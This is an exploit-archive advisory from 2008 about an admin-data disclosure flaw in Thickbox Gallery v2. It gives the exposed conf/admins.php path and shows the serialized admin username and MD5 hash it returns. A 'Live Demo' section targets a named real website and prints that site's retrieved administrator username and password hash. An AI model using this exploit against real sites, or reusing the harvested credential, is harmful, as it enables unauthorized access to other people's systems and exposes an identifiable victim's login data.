Thickbox Gallery v2 (admins.php) Admin Data Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Thickbox Gallery v2 (admins.php) Admin Data Disclosure Vulnerability
# Published : 2008-08-26
# Author : SirGod
# Previous Title : CMME 1.12 (LFI/XSS/CSRF/Backup/MkDir) Multiple Vulnerabilities
# Next Title : Simple Machines Forum <= 1.1.5 Admin Reset Password Exploit (win32)

#########################################################################################
[+] Thickbox Gallery v2 Admin Data Disclosure
[+] Discovered By SirGod                         
[+] www.mortal-team.org                         
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz
##########################################################################################

[+] Arbitrary Admin Data Disclosure

    - Go here and you will see the admin data ( login name + crypted password as MD5 )

       http://localhost/[Path]/conf/admins.php

    - Admin data :

          a:1:{s:5:"admin";s:32:"d73ed8a01f624fcb878296bc7ff302bc";}

    - Now extract the admin username and the hash :

        Username : admin

        Password : d73ed8a01f624fcb878296bc7ff302bc

[+] Live Demo

         http://www.davilin.com/tbg/conf/admins.php

    - Retrived :

          a:1:{s:8:"ytakenak";s:32:"56bd1d32bcb1fbd2609e4d7634febbd1";}

    - Name + Password

        Username : ytakenak
      
        Password : 56bd1d32bcb1fbd2609e4d7634febbd1
   

##########################################################################################

# www.Syue.com [2008-08-26]